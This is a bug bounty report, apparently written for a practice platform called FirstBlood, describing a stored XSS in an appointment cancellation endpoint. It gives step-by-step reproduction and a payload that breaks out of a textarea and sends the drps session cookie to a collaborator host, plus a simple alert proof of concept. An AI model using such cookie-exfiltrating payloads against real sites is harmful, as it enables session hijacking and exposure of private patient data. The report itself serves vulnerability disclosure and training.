FirstBlood-#241Stored XSS via malicious appointment message leads to ATO
This issue was discovered on FirstBlood v1

On 2021-05-14, jtcsec Level 4 reported:

When canceling an appointment, you can update the message of the appointment via /api/ma.php . With the proper elements, you can escape the "textarea" field and execute arbitrary javascript.

Steps to repoduce:

  1. Create an appointment and make note of the ID
  2. Click "Manage Appointment" and input your ID. Hit "Cancel your Appointment"
  3. In burp, send the POST request that canceled the appointment to repeater
  4. Add the "message" field with the following payload:
    message=</textarea/x><script>{collaborator instance}%2F%22%2Bdocument.cookie%29%3BoReq.send%28%29%3B</script>
  5. Go back to the appointment directly:{id from step 1}
  6. The page should load and the message box will be blank.
  7. Go to your collaborator instance and observe that a request was made with the drps cookie in the URL


An attacker can send a malicious link to a doctor. If the doctor is logged in and they click it, the attacker is able to use the doctor's drps cookie to hijack their session, since in the PoC above the cookie is exfiltrated to the attackers host. This allows the attacker to view all patient and appointment private information.

P2 High

Endpoint: /api/ma.php

Parameter: message

Payload: message=</textarea/x><script>alert(document.domain)</script>

FirstBlood ID: 9
Vulnerability Type: Stored XSS

When cancelling an appointment, an attacker can add a malicious XSS payload that will execute on manageappointment. Any user (non authed) can view this and will be affected.

Report Feedback


Creator & Administrator

Even though this is a dupe i'm awarding a bounty at my own discretion :) Nice find!